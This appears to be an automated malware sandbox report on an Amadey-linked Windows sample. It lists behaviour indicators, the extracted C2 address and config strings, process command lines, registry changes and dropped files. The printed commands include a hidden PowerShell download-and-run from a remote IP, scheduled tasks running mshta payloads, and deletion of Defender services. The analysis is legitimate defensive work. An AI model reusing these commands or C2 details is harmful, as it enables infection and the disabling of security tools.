      • file.exe (PID: 12780)
      • file.exe (PID: 11064)
      • file.exe (PID: 13172)
      • file.exe (PID: 14460)
      • file.exe (PID: 15636)
      • file.exe (PID: 16128)
      • file.exe (PID: 12636)
      • file.exe (PID: 13240)
      • file.exe (PID: 11556)
      • file.exe (PID: 14816)
      • file.exe (PID: 1668)
      • file.exe (PID: 10356)
      • file.exe (PID: 16276)
      • file.exe (PID: 16120)
      • file.exe (PID: 9352)
      • file.exe (PID: 11432)
      • file.exe (PID: 16280)
      • file.exe (PID: 2984)
      • file.exe (PID: 15432)
      • file.exe (PID: 12888)
      • file.exe (PID: 10912)
      • file.exe (PID: 17356)
      • file.exe (PID: 8180)
      • file.exe (PID: 17232)
      • file.exe (PID: 18016)
      • file.exe (PID: 18504)
      • file.exe (PID: 14112)
      • file.exe (PID: 17888)
      • file.exe (PID: 16924)
    • Application launched itself

      • firefox.exe (PID: 780)
      • firefox.exe (PID: 2564)
      • firefox.exe (PID: 8816)
      • firefox.exe (PID: 8792)
    • Disables trace logs

      • powershell.exe (PID: 1280)
    • Checks proxy server information

      • powershell.exe (PID: 1280)
      • ramez.exe (PID: 1184)
    • The executable file from the user directory is run by the Powershell process

      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • TempLFSL1XRVE2IOEEAJUKN1BDZHF5EFAIQD.EXE (PID: 11496)
    • Process checks computer location settings

      • TempFUUEA32DG8FMQQCXXGPUFNTM6V1NXUI1.EXE (PID: 7428)
      • ramez.exe (PID: 1184)
      • 1fad10fb3b.exe (PID: 7756)
      • nircmd.exe (PID: 736)
    • Creates files or folders in the user directory

      • ramez.exe (PID: 1184)
    • NirSoft software is detected

      • nircmd.exe (PID: 736)
    • Changes the display of characters in the console

      • cmd.exe (PID: 5304)
      • cmd.exe (PID: 1764)
      • cmd.exe (PID: 6512)
    • Checks operating system version

      • cmd.exe (PID: 6512)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 8088)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5936)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5936)
    • Reads the machine GUID from the registry

      • Unlocker.exe (PID: 3140)
      • Unlocker.exe (PID: 7800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Amadey

(PID) Process(1184) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)lv:
msi
Kaspersky Lab
av:
|
#
"
\App
00000422
dm:
Powershell.exe
ProgramData\
ps1
rundll32
http://
Content-Disposition: form-data; name="data"; filename="
SOFTWARE\Microsoft\Windows NT\CurrentVersion
dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
id:
VideoID
cred.dll|clip.dll|
0000043f
cmd
00000423
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
-executionpolicy remotesigned -File "
2022
------
2016
og:
\0000
CurrentBuild
2019
:::
S-%lu-
" && timeout 1 && del
ProductName
Panda Security
ESET
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/k
+++
?scr=1
Doctor Web
GET
SYSTEM\ControlSet001\Services\BasicDisplay\Video
/quiet
.jpg
d610cf342e
vs:
sd:
rundll32.exe
"taskkill /f /im "
pc:
random
=
360TotalSecurity
<d>
wb
Content-Type: multipart/form-data; boundary=----
Startup
Norton
&& Exit"
os:
https://
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
2025
Avira
%-lu
zip
POST
" Content-Type: application/octet-stream
Rem
/te4h2nus/index.php
------
5.34
<c>
clip.dll
AVAST Software
\
shell32.dll
" && ren
e3
ramez.exe
kernel32.dll
DefaultSettings.XResolution
d1
DefaultSettings.YResolution
185.156.72.96
r=
cred.dll
--
GetNativeSystemInfo
-%lu
ComputerName
&unit=
Keyboard Layout\Preload
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
ar:
Sophos
%USERPROFILE%
exe
e1
e2
st=s
Programs
0123456789
un:
rb
bi:
abcdefghijklmnopqrstuvwxyz0123456789-_
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
cmd /C RMDIR /s/q
Bitdefender
-unicode-
AVG
WinDefender
&&
shutdown -s -t 0
Comodo
00000419
Content-Type: application/x-www-form-urlencoded
/Plugins/
Main
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:16 14:39:34+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
850
Monitored processes
714
Malicious processes
17
Suspicious processes
150

Behavior graph

Click at the process to see the details
start random.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs tempfuuea32dg8fmqqcxxgpufntm6v1nxui1.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs #AMADEY ramez.exe firefox.exe no specs 1fad10fb3b.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs nsudolg.exe no specs cmd.exe conhost.exe no specs cmd.exe conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs mode.com no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs tasklist.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs nsudolg.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs findstr.exe no specs 7z.exe unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs sc.exe no specs find.exe no specs sc.exe no specs sc.exe no specs unlocker.exe cmd.exe no specs conhost.exe no specs sc.exe no specs iobitunlocker.exe no specs firefox.exe no specs iobitunlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs ramez.exe no specs firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs slui.exe no specs file.exe cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs file.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs file.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs file.exe no specs file.exe no specs file.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs file.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs file.exe no specs conhost.exe no specs file.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs file.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs powershell.exe no specs file.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs conhost.exe no specs file.exe no specs file.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs powershell.exe no specs conhost.exe no specs file.exe no specs file.exe no specs schtasks.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs schtasks.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs file.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs file.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs mshta.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs powershell.exe no specs conhost.exe no specs file.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs schtasks.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs file.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs file.exe no specs schtasks.exe no specs file.exe no specs conhost.exe no specs powershell.exe no specs file.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs powershell.exe no specs schtasks.exe no specs powershell.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs file.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs templfsl1xrve2ioeeajukn1bdzhf5efaiqd.exe no specs powershell.exe no specs file.exe no specs powershell.exe no specs schtasks.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs file.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs file.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs ramez.exe no specs file.exe no specs file.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs file.exe no specs file.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs file.exe no specs file.exe no specs conhost.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs powershell.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs file.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs powershell.exe no specs file.exe no specs schtasks.exe no specs file.exe no specs file.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs file.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs file.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs mshta.exe no specs powershell.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
140sc delete "WdBoot" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
300chcp 65001 C:\Windows\System32\chcp.comcmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Change CodePage Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
300C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn 8k6vNmazSTg /tr "mshta C:\Users\admin\AppData\Local\Temp\Tu02Btt8H.hta" /sc minute /mo 25 /ru "admin" /fC:\Windows\SysWOW64\cmd.exefile.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
444\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
536C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn 6jT7Dmauzmt /tr "mshta C:\Users\admin\AppData\Local\Temp\smEt7ep2s.hta" /sc minute /mo 25 /ru "admin" /fC:\Windows\SysWOW64\cmd.exefile.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
616reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent" C:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
632reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService" C:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
640"C:\Users\admin\Desktop\file.exe" C:\Users\admin\Desktop\file.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\file.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\user32.dll
668"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFSL1XRVE2IOEEAJUKN1BDZHF5EFAIQD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
720C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn onoarmaoP1D /tr "mshta C:\Users\admin\AppData\Local\Temp\ehWn3ZvCU.hta" /sc minute /mo 25 /ru "admin" /fC:\Windows\SysWOW64\cmd.exefile.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
295 300
Read events
295 119
Write events
49
Delete events
132

Modification events

(PID) Process:(5668) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5668) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5668) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1280) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
15
Suspicious files
231
Text files
178
Unknown types
1

Dropped files

PID
Process
Filename
Type
2564firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:
2564firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\sessionCheckpoints.json.tmpbinary
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
2564firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-child-current.binbinary
MD5:C95DDC2B1A525D1A243E4C294DA2F326
SHA256:3A5919E086BFB31E36110CF636D2D5109EB51F2C410B107F126126AB25D67363
1280powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_avgrkviu.21q.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2564firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\urlCache-current.binbinary
MD5:297E88D7CEB26E549254EC875649F4EB
SHA256:8B75D4FB1845BAA06122888D11F6B65E6A36B140C54A72CC13DF390FD7C95702
2564firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\cookies.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
2564firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\prefs-1.jstext
MD5:2C99A16AED3906D92FFE3EF1808E2753
SHA256:08412578CC3BB4922388F8FF8C23962F616B69A1588DA720ADE429129C73C452
2564firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmbinary
